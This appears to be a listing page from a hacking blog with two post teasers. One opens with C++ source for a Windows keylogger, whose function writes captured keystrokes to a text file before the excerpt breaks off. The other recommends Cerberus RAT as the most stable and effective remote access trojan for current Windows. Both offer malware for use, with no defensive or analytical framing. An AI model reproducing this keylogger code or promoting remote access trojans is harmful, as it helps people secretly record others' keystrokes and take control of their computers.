C++ keylogger

#include <tchar.h> #include <windows.h> #include <iostream> #include <windows.h> #include <winuser.h> #include <fstream> int Save(int out) { ofstream fout("abc.txt",ios::app); if (out==9) fout<<"\nTAB\n"; else if (out==32) fout<<' '; else if (out==13) fout<<'\n'; else if (out==16) fout<<"\nSHIFT\n"; else if (out>=48&&out<=59) fout<<out-48; else if (out>=65&&out<=90) fout<<char(tolower(out)); fout.close(); } int...

read more

Best RAT Software tested 2016

01. Cerberus RAT These days this RAT is not popular but it is working all new Windows OS. Cerberus  is the best, it is stable and simple and powerful. Cerberus RAT is the most stable ,most effective RAT ever used by me. It has small server...

read more

Copyright © Source Code Hacking. Designed by Momizat Team. Powered to Blogger by SpicyTweaks.

Scroll to top